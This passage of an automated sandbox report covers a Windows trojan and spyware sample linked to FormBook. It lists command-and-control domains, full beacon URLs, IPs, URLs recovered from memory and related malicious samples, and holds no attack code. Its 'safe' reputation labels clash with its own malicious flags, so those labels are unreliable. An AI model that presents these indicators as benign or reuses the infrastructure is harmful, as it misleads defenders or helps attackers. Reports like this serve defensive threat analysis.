                      http://www.masterqq.pro/vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.joeltcarpenter.online/9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.goldbracelet.top/eln6/0%Avira URL Cloudsafe
                      http://www.0be.info/5m3m/0%Avira URL Cloudsafe
                      http://www.gupiao.bet/t3a1/0%Avira URL Cloudsafe
                      http://www.joeltcarpenter.online/9pyp/0%Avira URL Cloudsafe
                      http://www.ssps.shop/r99d/0%Avira URL Cloudsafe
                      http://www.learnnow.info/6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.qqc5.top/fqrq/0%Avira URL Cloudsafe
                      http://www.qqc5.top/fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.learnnow.info/6npp/0%Avira URL Cloudsafe
                      http://www.masterqq.pro/vfw3/0%Avira URL Cloudsafe
                      http://digi-searches.com/sk-logabpstatus.php?a=cEo3ZXV6SDZ3SUlzNWF5ZlBnck1QNnhIeUxCdWwvT0ZBOTlJUlNVS0%Avira URL Cloudsafe
                      http://www.fengzheng.shop/plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.hasan.cloud/ve8l/0%Avira URL Cloudsafe
                      http://www.dojodigitize.shop/zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf0%Avira URL Cloudsafe
                      http://www.fengzheng.shop/plc2/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.masterqq.pro
                      		104.21.80.1
                      		truetrue
                        		unknown
                        www.goldbracelet.top
                        		104.21.36.239
                        		truefalse
                          		high
                          www.joeltcarpenter.online
                          		208.91.197.27
                          		truetrue
                            		unknown
                            www.gupiao.bet
                            		54.67.42.145
                            		truetrue
                              		unknown
                              0be.info
                              		173.0.157.187
                              		truetrue
                                		unknown
                                www.incgruporxat.click
                                		104.21.88.139
                                		truetrue
                                  		unknown
                                  www.regislemberthe.online
                                  		208.91.197.27
                                  		truetrue
                                    		unknown
                                    www.learnnow.info
                                    		199.192.23.123
                                    		truefalse
                                      		high
                                      qqc5.top
                                      		38.47.233.4
                                      		truetrue
                                        		unknown
                                        dojodigitize.shop
                                        		15.197.142.173
                                        		truetrue
                                          		unknown
                                          www.honk.city
                                          		13.248.169.48
                                          		truetrue
                                            		unknown
                                            www.ssps.shop
                                            		13.248.169.48
                                            		truetrue
                                              		unknown
                                              www.hasan.cloud
                                              		13.248.169.48
                                              		truetrue
                                                		unknown
                                                www.fengzheng.shop
                                                		193.180.209.15
                                                		truetrue
                                                  		unknown
                                                  www.0be.info
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.tageting.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.ulojenukw.shop
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.dojodigitize.shop
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.qqc5.top
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.incgruporxat.click/rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.regislemberthe.online/1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hasan.cloud/ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.incgruporxat.click/rm8a/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ssps.shop/r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.regislemberthe.online/1y0g/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.goldbracelet.top/eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.joeltcarpenter.online/9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.masterqq.pro/vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.joeltcarpenter.online/9pyp/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.goldbracelet.top/eln6/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.gupiao.bet/t3a1/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ssps.shop/r99d/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.0be.info/5m3m/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.learnnow.info/6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.qqc5.top/fqrq/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.qqc5.top/fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.learnnow.info/6npp/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.masterqq.pro/vfw3/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hasan.cloud/ve8l/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fengzheng.shop/plc2/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fengzheng.shop/plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.dojodigitize.shop/zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabfind.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.fontbureau.com/designersGQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dts.gnpge.comoPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/ac/?q=find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/?QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/bTheQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers?QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vdfind.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.tiro.comQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designersQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.goodfont.co.krQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://digi-searches.com/px.js?ch=1find.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.dynadot.com/forsale/gupiao.bet?drefid=2071find.exe, 00000004.00000002.4128433138.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000045CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://digi-searches.com/px.js?ch=2find.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.sajatypeworks.comQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.typography.netDQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.founder.com.cn/cn/cTheQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.incgruporxat.clickoPkpFmCiYVL.exe, 00000008.00000002.4129375797.00000000053CE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfind.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.galapagosdesign.com/DPleaseQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deDPleaseQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sakkal.comQsBdpe1gK5.exe, 00000000.00000002.1700569531.0000000006244000.00000004.00000020.00020000.00000000.sdmp, QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.comQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.networksolutions.com/find.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdffind.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.carterandcone.comlQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.founder.com.cn/cnQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlQsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.jiyu-kobo.co.jp/QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://digi-searches.com/sk-logabpstatus.php?a=cEo3ZXV6SDZ3SUlzNWF5ZlBnck1QNnhIeUxCdWwvT0ZBOTlJUlNVSfind.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.fontbureau.com/designers8QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      38.47.233.4
                                                                                                                                      		qqc5.topUnited States
                                                                                                                                      		174COGENT-174UStrue
                                                                                                                                      13.248.169.48
                                                                                                                                      		www.honk.cityUnited States
                                                                                                                                      		16509AMAZON-02UStrue
                                                                                                                                      193.180.209.15
                                                                                                                                      		www.fengzheng.shopSweden
                                                                                                                                      		158ERI-ASUStrue
                                                                                                                                      104.21.36.239
                                                                                                                                      		www.goldbracelet.topUnited States
                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                      104.21.88.139
                                                                                                                                      		www.incgruporxat.clickUnited States
                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                      199.192.23.123
                                                                                                                                      		www.learnnow.infoUnited States
                                                                                                                                      		22612NAMECHEAP-NETUSfalse
                                                                                                                                      15.197.142.173
                                                                                                                                      		dojodigitize.shopUnited States
                                                                                                                                      		7430TANDEMUStrue
                                                                                                                                      208.91.197.27
                                                                                                                                      		www.joeltcarpenter.onlineVirgin Islands (BRITISH)
                                                                                                                                      		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                      173.0.157.187
                                                                                                                                      		0be.infoUnited States
                                                                                                                                      		7979SERVERS-COMUStrue
                                                                                                                                      104.21.80.1
                                                                                                                                      		www.masterqq.proUnited States
                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                      54.67.42.145
                                                                                                                                      		www.gupiao.betUnited States
                                                                                                                                      		16509AMAZON-02UStrue

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                      Analysis ID:1589101
                                                                                                                                      Start date and time:2025-01-11 09:34:58 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 10m 37s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:2
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:QsBdpe1gK5.exe
                                                                                                                                      renamed because original name is a hash value
                                                                                                                                      Original Sample Name:2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@16/11
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 75%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 96%
                                                                                                                                      • Number of executed functions: 117
                                                                                                                                      • Number of non-executed functions: 290
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.246.45
                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target oPkpFmCiYVL.exe, PID 5016 because it is empty
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      03:35:51API Interceptor2x Sleep call for process: QsBdpe1gK5.exe modified
                                                                                                                                      03:36:44API Interceptor11258975x Sleep call for process: find.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      38.47.233.4Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.nng83.top/mg8c/
                                                                                                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • www.qqc5.top/fqrq/
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • www.qqc5.top/fqrq/
                                                                                                                                      13.248.169.48HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.optimismbank.xyz/lnyv/
                                                                                                                                      qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.tals.xyz/k1td/
                                                                                                                                      8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.bcg.services/5onp/
                                                                                                                                      z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.tals.xyz/cpgr/
                                                                                                                                      rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.lirio.shop/qp0h/
                                                                                                                                      ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.10000.space/3zfl/
                                                                                                                                      n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.lovel.shop/rxts/
                                                                                                                                      PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.aktmarket.xyz/wb7v/
                                                                                                                                      02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • www.remedies.pro/a42x/
                                                                                                                                      zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.aktmarket.xyz/wb7v/
                                                                                                                                      193.180.209.151k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • www.fengzheng.shop/plc2/
                                                                                                                                      104.21.36.239file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • www.goldbracelet.top/eln6/

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      www.masterqq.pro25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.32.1
                                                                                                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 172.67.213.249
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 172.67.213.249
                                                                                                                                      www.regislemberthe.online1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 208.91.197.27
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 208.91.197.27
                                                                                                                                      www.goldbracelet.topAuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.36.239
                                                                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.36.239
                                                                                                                                      DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.36.239
                                                                                                                                      Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 172.67.201.49
                                                                                                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 172.67.201.49
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 104.21.36.239
                                                                                                                                      www.incgruporxat.clickrACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.88.139
                                                                                                                                      santi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.21.88.139
                                                                                                                                      www.learnnow.infoMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 199.192.23.123
                                                                                                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 199.192.23.123
                                                                                                                                      Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 199.192.23.123
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 199.192.23.123
                                                                                                                                      www.joeltcarpenter.online1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 208.91.197.27
                                                                                                                                      www.gupiao.bet1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 13.248.169.48

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      COGENT-174USbIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 154.12.28.184
                                                                                                                                      8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 206.238.89.119
                                                                                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 136.161.83.55
                                                                                                                                      plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 38.47.232.196
                                                                                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 143.241.154.85
                                                                                                                                      4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 38.156.206.208
                                                                                                                                      C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 154.23.184.95
                                                                                                                                      ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 154.23.184.95
